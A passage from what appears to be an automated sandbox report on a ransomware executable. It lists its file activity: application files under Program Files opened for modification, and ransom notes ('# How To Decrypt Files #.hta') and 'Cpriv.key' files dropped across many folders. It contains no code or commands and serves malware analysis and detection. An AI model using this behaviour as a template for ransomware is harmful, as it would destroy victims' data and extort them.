Files\Microsoft Office\Office14\PAGESIZE\PGLBL097.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Templates\1033\ONENOTE\14\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\eclipse_update_120.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-favorites.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099204.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0239973.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\utilityfunctions.js de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\plugins\meta_engine\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\CASCADE\THMBNAIL.PNG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SportsMainBackground_PAL.wmv de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGMN075.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ckb\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Portable Devices\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\css\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Media Player\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0216874.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BrightOrange\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Apothecary.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft SQL Server Compact Edition\v3.5 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waning-crescent.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Push\NavigationLeft_SelectionSubpicture.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02208U.BMP de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-sampler.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-print.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_left_pressed.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\MSEnv\PublicAssemblies\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\NavigationLeft_SelectionSubpicture.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.attach.zh_CN_5.5.0.165303.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\de\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0212601.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Median.thmx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_alignright.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Library\Analysis\FUNCRES.XLAM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\FORMS\1033\REPORTL.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Sync Framework\v1.0\Runtime\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00668_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BrightOrange\TAB_OFF.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\psfont.properties.ja de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SL00298_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\nn\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\System\en-US\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Dot.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME31.CSS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PROOF\MSSP7EN.LEX de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\ProjectStatusReport.potx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\BLENDS\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\CMNTY_01.MID de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Swirl\TAB_OFF.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectToolsetIconImagesMask.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGWEBAD.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\en-US\css\clock.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\novelty_h.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\pause_hov.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15058_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04384_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\plugins\d3d9\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\STUDIO\THMBNAIL.PNG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-lib-uihandler_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0237228.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382952.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD21322_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\br\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\plugins\keystore\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\PROOF\MSWDS_EN.LEX de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\System\en-US\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR46F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL010.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\en-US\gadget.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\access-bridge-64.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00011_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-ui_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00441_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00443_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099178.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15133_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_Country.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\images\info.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD02075_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\ACCWIZ\ACWZDAT12.ACCDU de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\flyoutBack.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\logging.properties de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-text_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\EmbeddedView.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187859.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\el\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\System\ado\msado21.tlb de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.swt.nl_zh_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin_2.0.100.v20131209-2144.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\en-US\css\cpu.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\license.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21520_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base_ca.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.eclipse_1.1.200.v20140414-0825.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107748.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\rtf_spellcheck.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\FOLDPROJ.DPV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\FDFFile_8.ico de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-multiview_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00126_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0313970.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft SQL Server Compact Edition\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ka\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\bookbig.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Verve.thmx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\WindowsPowerShell\Configuration\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\Locales\kn.pak de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\44.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\fr.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Push\push.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\cronometer_h.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Google\Temp\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0164153.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Lime\TAB_OFF.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_right_disabled.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\jconsole.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Templates\1033\ONENOTE\14\Stationery\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153087.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0309705.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME09.CSS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\hu\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\144DPI\(144DPI)notConnectedStateIcon.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE03795_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\Access\DataType\Name.accft de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00440_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0304405.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\BRCH98SP.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\eu.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.ui_5.5.0.165303.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PROOF\MSTH7EN.LEX de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\drvSOFT.x3d de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\en-US\css\settings.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD00687_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02269_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00169_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Metro.eftx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_pressed.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolIcons\CHEVRON.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows NT\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base_rtl.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\MANIFEST.MF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\TOC98.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Checkers.api de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\plugins\spu\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\22.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152876.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PSRCHKEY.DAT de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\plugins\stream_out\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\Cpriv.key 